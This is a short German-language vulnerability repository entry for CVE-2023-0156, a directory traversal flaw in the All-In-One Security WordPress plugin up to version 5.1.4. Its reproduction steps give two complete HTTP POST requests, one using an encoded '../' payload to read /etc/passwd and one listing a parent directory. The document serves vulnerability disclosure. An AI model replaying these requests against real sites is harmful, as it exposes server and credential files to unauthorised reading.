
Repository für die Sicherheitslücke CVE-2023-0156.
CVE-ID: CVE-2023-0156
Schwachstellentyp: Directory Traversal
Beschreibung: Das All-In-One Security (AIOS)-Plugin für WordPress ist in Versionen bis einschließlich 5.1.4 anfällig für Directory Traversal. Dies ermöglicht authentifizierten Angreifern mit Administratorberechtigungen, den Inhalt beliebiger Dateien auf dem Server zu lesen.
Schritte zur Reproduktion:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs
Referenzen: